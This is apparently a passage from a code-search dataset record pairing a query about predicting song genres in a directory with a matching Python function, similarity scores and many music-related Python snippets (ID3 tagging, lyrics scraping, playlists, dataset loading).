In\n # that case, we attempt to move the featured artist to the title.\n _, featured = split_on_feat(artist)\n if featured and albumartist != artist and albumartist:\n self._log.info('{}', displayable_path(item.path))\n\n feat_part = None\n\n # Attempt to find the featured artist.\n feat_part = find_feat_part(artist, albumartist)\n\n # If we have a featuring artist, move it to the title.\n if feat_part:\n self.update_metadata(item, feat_part, drop_feat)\n else:\n self._log.info('no featuring artists found')", "def set_track_metadata(self, track = None, filename = None, url = None):\n if url == None or track == None:\n return None\n\n if filename == None:\n filename = get_track_filename(url)\n\n # id3 is only for mp3\n if not filename.endswith(\".mp3\"):\n if filename.endswith(\".wav\"):\n filename = self.convert_wav_to_mp3(filename)\n else:\n return None\n\n\n # Set title\n try:\n meta = ID3(filename)\n except ID3NoHeaderError:\n try:\n meta = File(filename, easy=True)\n meta.add_tags()\n meta.save()\n meta = ID3(filename)\n except:\n return\n except IOError:\n return\n\n try:\n meta.add(TIT2(encoding=3, text=track.title))\n meta.add(TCON(encoding=3, text=track.genre))\n meta.add(TCOM(encoding=3, text=track.user[\"username\"]))\n meta.save()\n\n artwork_filename = wget.download(track.artwork_url)\n\n audio = MP3(filename, ID3=ID3)\n\n # add ID3 tag if it doesn't exist\n try:\n audio.add_tags()\n except error:\n pass\n\n audio.tags.add(\n APIC(\n encoding=3, # 3 is for utf-8\n mime='image/jpeg', # image/jpeg or image/png\n type=3, # 3 is for the cover image\n desc=u'Cover',\n data=open(artwork_filename).read()\n )\n )\n audio.save()\n except:\n return", "def convertclasstoemotion(pred):\n \n label_conversion = {'0': 'neutral',\n '1': 'calm',\n '2': 'happy',\n '3': 'sad',\n '4': 'angry',\n '5': 'fearful',\n '6': 'disgust',\n '7': 'surprised'}\n\n for key, value in label_conversion.items():\n if int(key) == pred:\n label = value\n return label", "def change_music(self, track):\n try:\n if self.bg_volume != 0:\n self.current = self.music_lib[track]\n pygame.mixer.music.load(self.current)\n pygame.mixer.music.play(-1)\n self.current = track\n else:\n pygame.mixer.music.stop()\n except:\n print \"Couldn't load track '\", track + \"'!\"", "def get_song(self, song_id):\n url = get_song_url(song_id)\n result = self.common_get_request(url,headers)\n\n return result['songs'][0]", "def add_songs(self, song, position=None):\n song_found = find_object(song, self.tracks)\n if song_found is None:\n song_found = Song(song, self.artist)\n if position is None:\n self.tracks.append(song_found)\n else:\n self.tracks.insert(position, song_found)", "def addSong(self, song):\n queue = self.instantiate_queue()\n history = self.instantiate_history()\n options = self.instantiate_options()\n\n queue = [song for song in queue if song['explicit']]\n queue.append(song.to_dict())\n\n if len(queue) < 5:\n self.addImplicit(queue, history, fallback_song=song.to_dict())\n \n queue = self.sortSongs(queue)\n self.cache.set('queue', queue)", "def add_new_song(self):\n return \"New Song Added\"", "async def get_song(self, song_id: int) -> APIReturn:\n return await self._request(\"GET\", \"/getSong\", extra_query={\"id\": song_id})", "def azlyrics(song, artist):\n song = song.replace(\" \", \"\")\n artist = artist.replace(\" \", \"\")\n url = 'http://www.azlyrics.com/lyrics/' + artist + '/' + song + '.html'\n html_text = urllib.urlopen(url).read()\n soup = BeautifulSoup(html_text, \"lxml\")\n find_lyrics = 
soup.find_all(\"div\")\n div = [x for x in find_lyrics if str(x).find(\"class=\") == -1]\n if(len(div) > 1):\n return div[1]\n else:\n return -1", "def cut_and_eq(song_name):\r\n print(\"[{}] STATUS: Loading...\".format(song_name))\r\n sound_file = AudioSegment.from_mp3(song_name)\r\n print(\"[{}] STATUS: Loaded, now processing...\".format(song_name))\r\n sound_file = match_target_amplitude(sound_file, TARGET_VOLUME) # Amplify beforehand to prevent over-zealous cutting\r\n chunks = split_on_silence(sound_file, SILENCE_CUTOFF, THRESHOLD, keep_silence=ACCEPTABLE_SILENCE)\r\n\r\n if len(chunks) > 1:\r\n print(\"[{}] ERROR: Too many chunks ({}) cannot export\".format(song_name, len(chunks)))\r\n return song_name\r\n else:\r\n output = AudioSegment.empty()\r\n for chunk in chunks:\r\n output += chunk\r\n\r\n new_name = song_name.split(\".\")[0]\r\n print(\"[{}] STATUS: Processed, now exporting...\".format(song_name))\r\n metadata = mediainfo(song_name).get('TAG',{})\r\n output.export(OUTPUT_NAME_FORMAT.format(new_name), format=OUTPUT_FORMAT, tags=metadata)\r\n print(\"[{}] STATUS: Exported to {} - cleaned.{}\".format(song_name, new_name, OUTPUT_FORMAT))\r\n return None" ]
[ "0.6249288", "0.5961244", "0.57986456", "0.56695867", "0.5515968", "0.5402372", "0.53549737", "0.52264583", "0.52200854", "0.52137727", "0.5092305", "0.50832874", "0.50748336", "0.50739837", "0.5049888", "0.5019744", "0.5016217", "0.50088155", "0.49824685", "0.49791542", "0.49700025", "0.49674144", "0.4954255", "0.49470833", "0.4946148", "0.49414527", "0.4938247", "0.4920019", "0.49165025", "0.49130428", "0.4903235", "0.4901763", "0.4898171", "0.48882756", "0.48774943", "0.48739833", "0.4873043", "0.48684636", "0.48662606", "0.48532876", "0.48487294", "0.4839504", "0.48377663", "0.4837625", "0.48312905", "0.48271677", "0.48244035", "0.4819383", "0.48193055", "0.4790916", "0.47898015", "0.47792485", "0.47776407", "0.47766003", "0.47753587", "0.4774008", "0.47725734", "0.47720084", "0.47659323", "0.4757381", "0.4754819", "0.47535563", "0.4747155", "0.47375447", "0.47330058", "0.47238043", "0.471035", "0.47043628", "0.47035772", "0.46898836", "0.46811783", "0.46781078", "0.46705136", "0.46627876", "0.4662219", "0.46515533", "0.46471345", "0.4640796", "0.46407223", "0.46390992", "0.4636906", "0.46270898", "0.46234468", "0.46200588", "0.46199372", "0.4614574", "0.46142575", "0.45946994", "0.45862603", "0.45810372", "0.45773894", "0.45761734", "0.4571839", "0.45707753", "0.456543", "0.45608106", "0.4556176", "0.4554605", "0.45429918", "0.45277083" ]
0.82713926
0
Predict the genres of all songs in the given directory, saving this data in a file. Note that the genres of the songs are not known beforehand.
def predict_directory(self, directory_name, result_file_name):
    logging.info('Starting prediction.')
    with open(result_file_name, 'ab') as f:
        writer = csv.writer(f)
        writer.writerow(('id', 'category'))
        for song_id in os.listdir(directory_name):
            song = pd.read_csv('{}{}'.format(directory_name, song_id)).values
            predicted_genre = self.classify(song)
            logging.info('Predicted genre: {}'.format(predicted_genre))
            writer.writerow((song_id, predicted_genre))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def saveTmdbGenres():\n \n listGenres = tmdb.Genres().list()[\"genres\"]\n \n genres = { _format(g[\"name\"]):i for i, g in enumerate(listGenres) }\n\n np.save(GENRES_FILE, np.asarray([genres]))", "def random_by_genre_list(self):\n\n for genre in self.connection.walk_genres():\n url = self.build_url({\n \"mode\": \"random_by_genre_track_list\",\n \"foldername\": genre[\"value\"].encode(\"utf-8\")})\n\n li = xbmcgui.ListItem(genre[\"value\"])\n xbmcplugin.addDirectoryItem(\n handle=self.addon_handle, url=url, listitem=li, isFolder=True)\n\n xbmcplugin.endOfDirectory(self.addon_handle)", "def create_corpus_for_genre(genre):\n corpus = \"\"\n if genre in os.listdir(DATA_DIR):\n #iterate through artists\n for artist in os.listdir(DATA_DIR + \"/\" + genre + \"/\"):\n for filename in os.listdir(DATA_DIR + \"/\" + genre + \"/\" + artist + \"/\"):\n with open(DATA_DIR + \"/\" + genre + \"/\" + artist + \"/\" + filename) as f:\n corpus += f.read()\n return corpus", "def random_by_genre_track_list(self):\n\n genre = self.addon_args[\"foldername\"][0].decode(\"utf-8\")\n\n xbmcplugin.setContent(self.addon_handle, \"songs\")\n\n for track in self.connection.walk_random_songs(\n size=self.random_count, genre=genre):\n self.add_track(track, show_artist=True)\n\n xbmcplugin.endOfDirectory(self.addon_handle)", "def generateFeatureData(directory, outFileName='tmp/features.txt', isClassifying=False):\n\n audioList = getAudioFiles(directory)\n\n outFile = open(outFileName, \"w\")\n\n for audio in audioList:\n features = audio.getFeatures()\n \n if isClassifying: # We are classifying, we don't know type\n audioType = '0'\n else: # We are generating training data. Try to predict using file name\n audioType = '1' if audio.predictType() == 'Music' else '-1'\n \n outFile.write(audioType + ' ' + features + ' # ' + audio.name + '\\n')\n\n outFile.close()\n\n return audioList", "def save_data(data_dir):\r\n for k in range(1,11):\r\n fold_name = 'fold' + str(k)\r\n print \"Saving\" + fold_name\r\n features, labels = process_audio(parent_path, [fold_name])\r\n labels = encode(labels)\r\n print \"Features of\", fold_name , \" = \", features.shape\r\n print \"Labels of\", fold_name , \" = \", labels.shape\r\n feature_file = os.path.join(data_dir, fold_name + '_x.npy')\r\n labels_file = os.path.join(data_dir, fold_name + '_y.npy')\r\n np.save(feature_file, features)\r\n print \"Saved \" + feature_file\r\n np.save(labels_file, labels)\r\n print \"Saved \" + labels_file", "def write_pred_kaggle_file(cls, outfname, speech):\n yp = cls.predict(speech.test_doc_vec)\n labels = speech.le.inverse_transform(yp)\n f = codecs.open(outfname, 'w')\n f.write(\"FileIndex,Category\\n\")\n for i in range(len(speech.test_fnames)):\n fname = speech.test_fnames[i]\n f.write(fname + ',' + labels[i] + '\\n')\n f.close()", "def save_artist_songs(genius, name, max_songs, out_dir):\n\tartist = genius.search_artist(name, max_songs=max_songs, sort=\"title\")\n\tif artist is not None and artist.songs is not None:\n\t\tsongs = list(filter(lambda x: x is not None, map(lambda x: x.lyrics, artist.songs)))\n\t\twith open(out_dir + name + '.txt', 'w') as f:\n\t\t\tf.write(''.join(songs))\n\t\treturn len(artist.songs)", "def make_profiles(datafolder, profilefolder, size):\n files = os.listdir(datafolder) \n for file in files:\n languagename = file.split(\"-\")[0]\n encodering = file.split(\"-\")[1]\n bestand = open('training/' + file,'r' , encoding=encodering) #Reads with the correct encoding.\n test = langdetect.trigram_table(bestand.read(), size) 
#Creates a ngram table of the content of the file.\n filename = languagename + '.' + str(size) + '.txt' #Creates a new filename.\n newfile = open('trigram-models/' + filename, 'w', encoding=\"utf-8\") \n langdetect.write_trigrams(test, 'trigram-models/' + filename) #Creates a new file with the ngrams and their frequency.\n newfile.close()", "def store_samples(self, directory, preprocess_fnc):\n print('Called with', directory)\n out_directory = self._get_directory(preprocess_fnc, directory)\n print('Outdir', out_directory)\n if not os.path.exists(out_directory):\n os.makedirs(out_directory)\n\n print('scanning', os.path.join(self._data_directory, directory))\n\n audio_files = list(iglob_recursive(os.path.join(self._data_directory, directory), '*.flac'))\n print('audio files:', len(audio_files), 'from', os.path.join(self._data_directory, directory))\n with Pool(processes=multiprocessing.cpu_count()) as pool:\n transcript_dict = self._transcript_dict\n\n for audio_file in audio_files:\n audio_id = self._extract_audio_id(audio_file)\n transcript_entry = transcript_dict[audio_id]\n transform_args = (audio_file, preprocess_fnc, transcript_entry, out_directory)\n pool.apply_async(SpeechCorpusReader._transform_and_store_sample, transform_args)\n\n pool.close()\n pool.join()", "def save_all_chunks_with_labels(audio_dir, json_dir, csv_dir):\n for file in os.listdir(json_dir):\n file_path = os.path.join(json_dir, file)\n audio_file_path = os.path.join(audio_dir, file)[:-4] + \"wav\"\n with open(file_path) as f:\n data = json.load(f)\n save_arrays_with_labels(audio_file_path, data, csv_dir)", "def gen_datafiles():\n\tnum_reads = 10000\n\tnum_samples = 100\n\tgen_sequences('hg38.fa', num_reads, num_samples, 1, 'hg38_train.txt')\n\tgen_sequences('HIV-1.fasta', num_reads, num_samples, 0, 'HIV-1_train.txt')\n\tgen_sequences('hg38.fa', num_reads, num_samples, 1, 'hg38_test.txt')\n\tgen_sequences('HIV-1.fasta', num_reads, num_samples, 0, 'HIV-1_test.txt')", "def save_predictions(self,file_path):\n # compute average of predictions\n num_examples = len(self.labels)\n\n if num_examples == 0:\n raise Exception (\"nothing to save\")\n\n def string_to_average(string):\n return np.average(np.array(string.split(\",\"),dtype=float))\n prediction_averages = np.around(map(string_to_average,self.predictions),decimals=3)\n\n # sort by prediction averages\n order = np.flipud(prediction_averages.argsort())\n prediction_averages = prediction_averages[order]\n self.pl_pairs = self.pl_pairs[order]\n self.predictions = self.predictions[order]\n self.labels = self.labels[order]\n # write all of the predictions to the file\n f = open(file_path + \"_predictions.txt\", 'w')\n\n for i in range(num_examples):\n f.write((str(prediction_averages[i]) + \" \"*10)[:10]\n + (str(self.labels[i]) + \" \"*50)[:10]\n + str(self.pl_pairs[i] + \" \"*50)[:50]\n + str(self.predictions[i] + \" \"*50)[:50]\n + \"\\n\")\n\n f.close()\n # write and save some metadata\n\n f = open(file_path + \"_scores.txt\", 'w')\n f.write(\"top 100 score: \")\n f.write(str(self.top_100_score(self.predictions,self.labels)))\n f.write(\"\\nAUC: \")\n f.write(str(self.auc(prediction_averages,self.labels)))\n f.write(\"\\nconfusion matrix: \")\n f.write(str(self.confusion_matrix(prediction_averages,self.labels)))\n f.close()\n\n # write a file in Kaggle MAP{K} submision format\n # the form is:\n # Protein1, Ligand3 Ligand4 Ligand2\n # Protein2, Ligand5 Ligand9 Ligand7\n\n raw_database_array = np.genfromtxt(FLAGS.test_set_file_path, delimiter=',', dtype=str)\n 
receptor_set = raw_database_array[:,2]\n receptor_set = list(set(map(lambda x:x.split('.')[0].split('/')[-1],receptor_set)))\n submission = {}\n for i in range(num_examples):\n # get the name of the ligand and protein\n ligand,receptor = self.pl_pairs[i].split(',')\n ligand = ligand.split('/')[-1].split('.')[0]\n receptor = receptor.split('/')[-1].split('.')[0]\n # add all protein-ligand pairs to submission\n if not receptor in submission.keys():\n submission[receptor] = {}\n submission[receptor]['ligands'] = [ligand]\n submission[receptor]['score'] = [prediction_averages[i]]\n else:\n submission[receptor]['ligands'].append(ligand)\n submission[receptor]['score'].append(prediction_averages[i])\n \n # write and save submisison to file\n # if failed to predict any liagnd for a receptor\n # use placeholder 'L' as predict result\n # e.g. P1234,L\n with open(file_path+'_submission.csv','w') as f:\n f.write('Id,Expected\\n')\n for key in receptor_set:\n if key in submission.keys():\n ligands = np.array(submission[key]['ligands'])\n scores = np.array(submission[key]['score'])\n ligands = ligands[np.flipud(scores.argsort())]\n f.write(key+','+' '.join(ligands)+'\\n')\n else:\n f.write(key+','+'L'+'\\n')", "def get_songs(path):\r\n song_list = []\r\n genre_paths = glob.glob(path + '/*')\r\n for genre_path in genre_paths:\r\n artist_paths = glob.glob(genre_path + '/*')\r\n for artist_path in artist_paths:\r\n album_paths = glob.glob(artist_path + '/*')\r\n for album_path in album_paths:\r\n lyrics_paths = glob.glob(album_path + '/*.txt')\r\n for lyrics_path in lyrics_paths:\r\n song = {}\r\n song[\"genre\"] = genre_path.replace(path + '/', '')\r\n song[\"artist\"] = artist_path.replace(genre_path + '/', '')\r\n song[\"album\"] = album_path.replace(artist_path + '/', '')\r\n song[\"lyrics\"] = open(lyrics_path).read()\r\n song[\"name\"] = lyrics_path[:-4].replace(album_path + '/', '')\r\n song[\"x\"] = 0\r\n song[\"y\"] = 0\r\n song_list.append(song)\r\n return song_list", "def write_genre_index(self):\n for giEntry in self.genreIndex:\n # Write to file\n self.db_file.write(giEntry.get_representation())", "def genre_list(self):\n\n for genre in self.connection.walk_genres():\n url = self.build_url({\n \"mode\": \"albums_by_genre_list\",\n \"foldername\": genre[\"value\"].encode(\"utf-8\")})\n\n li = xbmcgui.ListItem(genre[\"value\"])\n xbmcplugin.addDirectoryItem(\n handle=self.addon_handle, url=url, listitem=li, isFolder=True)\n\n xbmcplugin.endOfDirectory(self.addon_handle)", "def save(self, directory):\n for field in self.save_fields:\n np.save(pjoin(directory, field+'.npy'), self.__dict__[field])", "def main():\n\n classes = {\n \"rain\":0,\n \"rooster\":1,\n \"crying_baby\":2,\n \"sea_waves\":3,\n \"clock_tick\":4,\n \"sneezing\":5,\n \"dog\":6,\n \"crackling_fire\":7,\n \"helicopter\":8,\n \"chainsaw\":9,\n }\n\n with open(\"../data/audio/ESC-50-master/meta/esc50.csv\") as f:\n lines = [i[:-1] for i in f.readlines()]\n lines = lines[1:]\n\n os.system(\"rm -rf ../data/audio/ESC-10\")\n os.system(\"mkdir ../data/audio/ESC-10\")\n os.system(\"mkdir ../data/audio/ESC-10/audio\")\n\n meta = []\n for line in lines:\n t = line.split(\",\")\n if (t[-3] == 'True'):\n meta.append(\"../data/audio/ESC-10/audio/%s %d\" % (t[0],classes[t[3]]))\n src = \"../data/audio/ESC-50-master/audio/\"+t[0]\n dst = \"../data/audio/ESC-10/audio/\"+t[0]\n shutil.copy(src,dst)\n\n with open(\"../data/audio/ESC-10/filelist.txt\",\"w\") as f:\n for m in meta:\n f.write(m+\"\\n\")", "def to_files(self, gen, 
filenames=None):\n\n if filenames:\n self.filenames = filenames\n\n for f, arr in zip(self.pathgen, gen):\n np.save(f, arr)", "def gen_random_samples():\n if os.path.exists('Song_Samples'):\n pass\n else:\n os.mkdir('Song_Samples')\n for filename in os.listdir(\"Songs\"):\n rate, data = wavfile.read(os.path.join(\"Songs\", filename))\n song_duration = len(data) // rate\n start_point = randint(0, song_duration - SAMPLE_DURATION)\n end_point = start_point + SAMPLE_DURATION\n subprocess.call(['ffmpeg', '-i', os.path.join(\"Songs\", filename),\n '-ss', str(datetime.timedelta(seconds=start_point)), '-to',\n str(datetime.timedelta(seconds=end_point)), '-y', os.path.join(\"Song_Samples\", filename)])", "def save_all_scripts(genre):\n if os.path.exists('scripts'):\n pass\n else:\n os.mkdir('scripts')\n\n titles = list_titles(genre)\n for title in titles:\n save_script(title)", "def load_dataset(song_folder_name):\n\n # Get all songs saved as numpy arrays in the given folder\n song_list = os.listdir(song_folder_name)\n\n # Create empty lists\n label = []\n mfccs = []\n song_name = []\n\n # Load each song into memory if the artist is included and return\n for song in song_list:\n with open(os.path.join(song_folder_name, song), 'rb') as fp:\n loaded_song = dill.load(fp)\n\n label.append(loaded_song[0])\n mfccs.append(loaded_song[1])\n song_name.append(loaded_song[2])\n\n return label, mfccs, song_name", "def make_predictions(file_list, model, is_game=False):\n temp_list = []\n for wav_file in glob.glob(file_list):\n temp_list.append(reshape_and_predict(filepath=wav_file, saved_model=model, is_game=is_game))\n\n return temp_list", "def gene_txt_of_load(dirname):\n str_list=[]\n list_name=[]\n print 'Yolo Debut'\n for file in os.listdir(dirname):\n if file.endswith(\".npy\"):\n str_list.append(file[:-4]+'=np.load(dirname+'+'\\\"/\\\"'+'+\\\"'+file+'\\\")')\n list_name.append(file[:-4])\n print '\\n'.join(str_list)\n print ','.join(list_name)\n return str_list", "def map_audio(self): \n for root, dirs, files in os.walk(self.dir):\n for name in files:\n if (name.split(\".\")[-1].lower() == 'm4a' or \\\n name.split(\".\")[-1].lower() == 'mp3'):\n \n cur_path = \"{0}/{1}\".format(root, name)\n cur_file = auto.File(cur_path)\n \n artist = cur_file.artist.lower().strip()\n album = cur_file.album.lower().strip()\n title = cur_file.title.lower().strip()\n bitrate = cur_file.bitrate\n \n if not artist in self.audio_dict:\n self.audio_dict[artist] = {}\n \n if not album in self.audio_dict[artist]:\n self.audio_dict[artist][album] = {}\n \n title_key = title\n for in_album_title in self.audio_dict[artist][album]:\n if sm(None, title, in_album_title).ratio() > 0.9:\n title_key = in_album_title\n \n if not title_key in \\\n self.audio_dict[artist][album]:\n self.audio_dict[artist][album][title_key] = []\n \n self.audio_dict[artist][album][title_key].append({\n 'path': cur_path,\n 'bitrate': bitrate,\n 'file_name': name\n })\n \n return self", "def read_hansard(train_dir, num_sentences):\n \"\"\"\n # TODO\n # Get starting files from directory:\n # Get file num\n # If file language is english get french with same num, & vice versa\n # load files into two lists: curr_english, curr_french\n # while count < num_sentences:\n # if index >= len(curr_english):\n # load two new files into curr_english and curr_french\n # make sure to keep track of files already read\n # index = 0 \n # sentences['e'][count] = preprocess(curr_english[index])\n # sentences['f'][count] = preprocess(curr_french[index])\n\n 
#====================================\n # Return (eng, fre) version:\n # Get starting files from directory:\n # Get file num\n # If file language is english get french with same num, & vice versa\n # load files into two lists: curr_english, curr_french\n # while count < num_sentences:\n # if index >= min(len(curr_english), len(curr_french)):\n # load two new files into curr_english and curr_french\n # make sure to keep track of files already read\n # index = 0\n # preprocess and remove SENTSTART and SENTEND from the sentences\n # eng[count] = eng_sentence.split()\n # fre[count] = fre_sentence.split()\n # return (eng, fre)\n \"\"\"\n\n files_examined = set()\n count = 0\n eng = []\n fre = []\n\n # for subdir, dirs, files in os.walk(train_dir):\n # for file in files:\n\n files = os.listdir(train_dir)\n for file in files:\n\n # First set up and validate the files\n file_name, extension = os.path.splitext(file)\n file_name, file_id = os.path.splitext(file_name)\n\n # Skip if not .e or .f file\n if not (extension == '.f' or extension == '.e'):\n continue\n\n # Skip if already examined this file pair\n if file_id in files_examined:\n continue\n\n # Skip if either language file is not available\n eng_file = file_name + file_id + '.e'\n fre_file = file_name + file_id + '.f'\n if eng_file not in files or fre_file not in files:\n continue\n\n # If it reaches here we know we can process it\n files_examined.add(file_id)\n print( \"Reading \" + str(count+1))\n\n # Finally open files and iterate simultaneously\n eng_path = os.path.join(train_dir, eng_file)\n fre_path = os.path.join(train_dir, fre_file)\n with open(eng_path) as english:\n with open(fre_path) as french:\n for E, F in zip(english, french):\n\n # Stop when limit reached\n if count >= num_sentences:\n return (eng, fre)\n\n # Process and split sentences\n E = preprocess(E.rstrip(), 'e')\n F = preprocess(F.rstrip(), 'f')\n\n E_words = E.split()\n F_words = F.split()\n\n eng.append(E_words)\n fre.append(F_words)\n\n count += 1\n\n return (eng, fre)", "def gif_generation(orig_label_path, bound_data_path):\n for sample in os.listdir(bound_data_path):\n if not sample.startswith('.') and osp.isdir(osp.join(bound_data_path, sample)):\n sample_path = osp.join(bound_data_path, sample)\n for artery in os.listdir(sample_path):\n orig_label_pick_path = osp.join(orig_label_path, sample, artery, 'data.pkl')\n bound_pick_path = osp.join(bound_data_path, sample, artery, 'data.pkl')\n\n # function to save result of each artery into gif\n save_gif_artery(orig_label_pick_path, bound_pick_path)", "def load_all_music(directory, accept=(\".wav\", \".mp3\", \".ogg\", \".mdi\")):\n songs = {}\n for song in os.listdir(directory):\n name,ext = os.path.splitext(song)\n if ext.lower() in accept:\n songs[name] = os.path.join(directory, song)\n return songs", "def load_all_music(directory, accept=(\".wav\", \".mp3\", \".ogg\", \".mdi\")):\n songs = {}\n for song in os.listdir(directory):\n name, ext = os.path.splitext(song)\n if ext.lower() in accept:\n songs[name] = os.path.join(directory, song)\n return songs", "def eval_genuine(path):\n out = []\n with open(path, 'r') as fp:\n for line in fp:\n fields = line.rstrip().split()\n ii, tt = fields[:2]\n if tt == 'genuine':\n out.append(ii[2:-4]) # remove 'D_' and '.wav'\n\n return out", "def load_mel_dataset(song_folder_name):\n\n # Get all songs saved as numpy arrays in the given folder\n song_list = os.listdir(song_folder_name)\n\n # Create empty lists\n label = []\n spectrogram = []\n song_name = []\n\n # Load each song 
into memory if the artist is included and return\n for song in song_list:\n with open(os.path.join(song_folder_name, song), 'rb') as fp:\n loaded_song = dill.load(fp)\n\n label.append(loaded_song[0])\n spectrogram.append(loaded_song[1])\n song_name.append(loaded_song[2])\n\n return label, spectrogram, song_name", "def getData(directory):\n train_path = directory\n corpus_file = maybe_download(directory, \"training-giga-fren.tar\",\n _DATA_URL_)\n if not os.path.isdir(_RAW_SENTENCES_DIR_):\n print(\"Extracting tar file %s\" % corpus_file)\n with tarfile.open(corpus_file, \"r\") as corpus_tar:\n corpus_tar.extractall(directory)\n os.makedirs(_RAW_SENTENCES_DIR_)\n gunzip_file(train_path + \"giga-fren.release2.fixed.en.gz\", _RAW_SENTENCES_DIR_+'sentences.txt')\n \n else:\n print(\"Data already downloaded.\")", "def files():\r\n fn=pd.read_csv(request.files.get('fnm'))\r\n scaling = scaler.transform(fn)\r\n prediction = classifier.predict(scaling)\r\n return 'Predictions'+ str(list(prediction))", "def GetSongFilenames():\n\n\t## Loop through each directory\n\tsong_files = []\n\tfor root, dirs, fnames in os.walk(\"_data\\\\fma_small\\\\\"):\n\t\t\n\t\t## Skip the first level\n\t\tif root == \"_data\\\\fma_small\\\\\":\n\t\t\tcontinue\n\n\t\t## Otherwise collect the files, appending\n\t\t## the root path.\n\t\tsong_files += [root+\"\\\\\"+f for f in fnames]\n\n\treturn song_files", "def generate(self):\n if len(self.files) == 0:\n raise Exception('no files to process')\n music = []\n for filename in self.files:\n music.extend(self._process_file(filename))\n return self._extract_raw(sorted(music, key=lambda tup: (tup[0], tup[1])))", "def save(self, path):\n individual = self.population.fittest_individual()\n order = [int(l) for l in individual.label_order]\n fitness = individual.fitness\n data = {'name': self.ds.name,\n 'num_labels': len(order),\n 'order': order,\n 'fitness': fitness\n }\n with open(path, 'w') as f:\n json.dump(data, f)", "def sentences_for_dir(path='./',separate=True,gzipped=True):\n for filename in cowfiles(path):\n for metadata, data in sentence_generator(filename,separate,gzipped):\n yield metadata, data", "def walk_dataset_librispeech(dataset_path: Path, hp: Map):\n for speaker in dataset_path.iterdir():\n embedding = None # embedding = embed_speaker_librispeech(speaker, hp)\n for flac in speaker.rglob(\"*.flac\"):\n yield preprocess_flac_librispeech(flac, embedding, hp)", "def Subtask4_pre_train_1(path):\n n_dict = {}\n files = os.listdir(path)\n for i in files:\n with open(os.path.join(path, i)) as fp:\n lines = fp.readlines()\n for line in lines:\n text = eval(line)['text'] # extract data from the field of 'text'.\n words = text.split(' ')\n for w in words:\n w = w.replace(\"-LRB-\", \"\").replace(\"-RRB-\", \"\") \\\n .replace(\"-LSB-\", \"\").replace(\"-RSB-\", \"\").replace(\"--\", \"\")\n w = re.sub(\"[,.。:_=+*&^%$#@!?()<>/`';|]\", \"\", w) # replace the noisy with space.\n if not w in n_dict:\n n_dict[w] = 1\n else:\n n_dict[w] += 1 # count the frequencies of every term.\n np.save(PATH + \"pre_train_1_Subtask4.npy\", n_dict)\n print('save complete')", "def read_files(self):\n for f in self.filenames:\n self.games.extend(pgn.loads(open(f).read()))", "def save(self):\n\n if (self._save != '0'):\n p = self._save+self._path[-3:-1]+'_'+str(self._qn)+'.dat'\n np.savetxt(p, self._gf)\n else:\n sys.exit(\"Wrong path to save\")", "def retrieve_sequences_pickle(working_directory, genes):\n\n sequences_per_gene = {}\n for gene in genes:\n with 
open(os.path.join(working_directory, \"sequences\", gene + \".pkl\"), 'rb') as handle:\n sequences = pickle.load(handle) \n sequences_per_gene.update({gene:sequences})\n return sequences_per_gene", "def writeRatingsToSongs(self):\n judgeNotesLogger.info(\"writeRatingsToSongs: Writing file containing songs for each rating\")\n try:\n os.chdir(self.fileDir)\n sortedRatings = sorted(self.ratingsToSongs.keys(), key=float)\n fileName = \"ratingsToSongs_\" + self.judgeName + \".txt\"\n with open(fileName, 'w') as outFile:\n\n # Write out the normal ratings first.\n for rating in sortedRatings:\n songsInRating = self.ratingsToSongs[rating]\n outFile.write(\"[\"+str(rating)+\"/10]\")\n for song in songsInRating:\n if song[2] != \"\":\n outFile.write(\"\\n--> \" + str(song[0]) + \" {\" + str(song[1]) + \"} (\"+str(song[2]) + \")\")\n else:\n outFile.write(\"\\n--> \" + str(song[0]) + \" {\" + str(song[1]) + \"}\")\n outFile.write(\"\\n\\n\")\n\n # Write out the special ratings after.\n sortedRatings = sorted(self.specialRatingsToSongs.keys(), key=str.lower)\n for rating in sortedRatings:\n songsInRating = self.specialRatingsToSongs[rating]\n outFile.write(\"[\"+str(rating)+\"]\")\n for song in songsInRating:\n if song[2] != \"\":\n outFile.write(\"\\n--> \" + str(song[0]) + \" {\" + str(song[1]) + \"} (\"+str(song[2]) + \")\")\n else:\n outFile.write(\"\\n--> \" + str(song[0]) + \" {\" + str(song[1]) + \"}\")\n outFile.write(\"\\n\\n\")\n \n outFile.close()\n judgeNotesLogger.info(\"writeRatingsToSongs: Successfully wrote file '%s'\", fileName)\n except:\n judgeNotesLogger.warning(\"writeRatingsToSongs: {0}: {1}\".format(sys.exc_info()[0].__name__,\n str(sys.exc_info()[1])))", "def get_audios_and_labels(data_dir: str) -> (List[Any], List[int]):\n test_dataset = get_dataset(data_dir)\n test_audios = []\n test_labels = []\n for audio, label in test_dataset:\n test_audios.append(audio.numpy())\n test_labels.append(label.numpy())\n test_audios = np.array(test_audios)\n test_labels = np.array(test_labels)\n return test_audios, test_labels", "def process(self, dirPath, outPath):\n total_grams = 0\n four_grams = defaultdict(int)\n files = os.listdir(dirPath)\n for fnx in files:\n fnxPath = os.path.join(dirPath, fnx)\n if fnx != 'README' and os.path.isfile(fnxPath):\n tokens = self.preprocess_file_to_tokens(dirPath, fnx)\n countInDoc, gramsInDoc, countNew, grams = \\\n self.add_four_grams(tokens, four_grams)\n total_grams += countNew\n print(\"%-30s%10d%10d\" % (fnx, countInDoc, countNew) )\n print(\"Total 4-grams found:\", total_grams)\n return total_grams, four_grams", "def load_data(self):\r\n if not os.path.exists(self.origin_dir):\r\n raise ValueError(f\"Folder {self.origin_dir} not exists!\")\r\n\r\n # loop folders\r\n listglobs = glob.glob(os.path.join(self.origin_dir)+r\"[0-9]*\")\r\n count = 0\r\n temp = []\r\n for x in listglobs:\r\n\r\n # step1, get speaker id md5\r\n user_id = x.rsplit(\"\\\\\")[-1]\r\n speaker_id = hashlib.md5(user_id.encode(\"utf-8\")).hexdigest()\r\n self.wav_desc[\"speaker_id\"] = speaker_id\r\n print(\"1=>\", x)\r\n\r\n for k in [\"你好小顺\", \"小顺小顺\"]:\r\n paths = os.path.join(x, k)\r\n print(\"2=>\", paths)\r\n # step2, parse speaker info\r\n with open(os.path.join(paths, \"spearker_info.txt\"), 'r', encoding=\"utf-8\") as f:\r\n line = f.readline()\r\n arrs = line.strip().split(\"\\\\t\")\r\n if len(arrs) != 3:\r\n raise ValueError(\"Required three field in speaker_info<id>\\t<gender>\\t<age>\")\r\n self.wav_desc[\"gender\"] = arrs[1].strip(\"<\").rstrip(\">\")\r\n 
